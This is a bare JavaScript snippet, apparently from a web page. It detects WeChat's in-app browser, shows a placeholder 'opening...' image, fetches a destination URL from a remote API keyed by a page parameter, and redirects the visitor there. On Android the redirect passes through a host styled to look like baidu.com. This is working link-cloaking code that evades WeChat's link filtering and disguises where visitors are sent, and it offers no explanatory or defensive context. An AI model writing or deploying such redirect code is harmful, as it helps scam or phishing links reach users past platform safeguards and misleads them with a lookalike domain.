<script>
    function isWechat() {
        var userAgent = window.navigator.userAgent.toLowerCase();
        if (userAgent.indexOf('micromessenger') !== -1) {
            return true;
        }
        return false;
    }
    function isAndroidWechat() {
        var userAgent = window.navigator.userAgent.toLowerCase();
        if (userAgent.indexOf('micromessenger') !== -1 && userAgent.indexOf('android') !== -1) {
            return true;
        }
        return false;
    }

    if (isWechat()) {
        document.documentElement.innerHTML = '<!DOCTYPE html>\
        <html>\
        <head>\
            <title>正在打开中...</title>\
            <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">\
            <style>\
                body {\
                    overflow: hidden;\
                    margin: 0;\
                    padding: 0;\
                }\
                .image-container {\
                    position: relative;\
                    height: 100vh;\
                }\
                .image-wrapper {\
                    position: absolute;\
                    top: 0;\
                    left: 0;\
                    right: 0;\
                    bottom: 0;\
                    display: flex;\
                    justify-content: center;\
                    align-items: center;\
                }\
                img {\
                    max-width: 100%;\
                    max-height: 100%;\
                    width: auto;\
                    height: auto;\
                }\
            </style>\
        </head>\
        <body>\
            <div class="image-container">\
                <div class="image-wrapper">\
                    <img src="./1.png">\
                </div>\
            </div>\
        </body>\
            </html>';

        if (isAndroidWechat()) {
            var fixedPrefix = 'http://baidu.com.56.gay/weixin.php?url=';
            var url = new URL(window.location.href);
            var id = url.searchParams.get('id');
            var xhr = new XMLHttpRequest();
            xhr.open('GET', 'https://api.ku.sh.cn/wx/apikey.php?key=' + id, true);
            xhr.onreadystatechange = function() {
                if (xhr.readyState === XMLHttpRequest.DONE) {
                    if (xhr.status === 200) {
                        var response = JSON.parse(xhr.responseText);
                        var redirectUrl = response.url;
                        var fullRedirectUrl = fixedPrefix + encodeURIComponent(redirectUrl);
                        window.location.href = fullRedirectUrl;
                    }
                }
            };
            xhr.send();
        } else {
            var url = new URL(window.location.href);
            var id = url.searchParams.get('id');
            var xhr = new XMLHttpRequest();
            xhr.open('GET', 'https://api.ku.sh.cn/wx/apikey.php?key=' + id, true);
            xhr.onreadystatechange = function() {
                if (xhr.readyState === XMLHttpRequest.DONE) {
                    if (xhr.status === 200) {
                        var response = JSON.parse(xhr.responseText);
                        var redirectUrl = response.url;
                        window.location.href = redirectUrl;
                    }
                }
            };
            xhr.send();
        }
    }

</script>
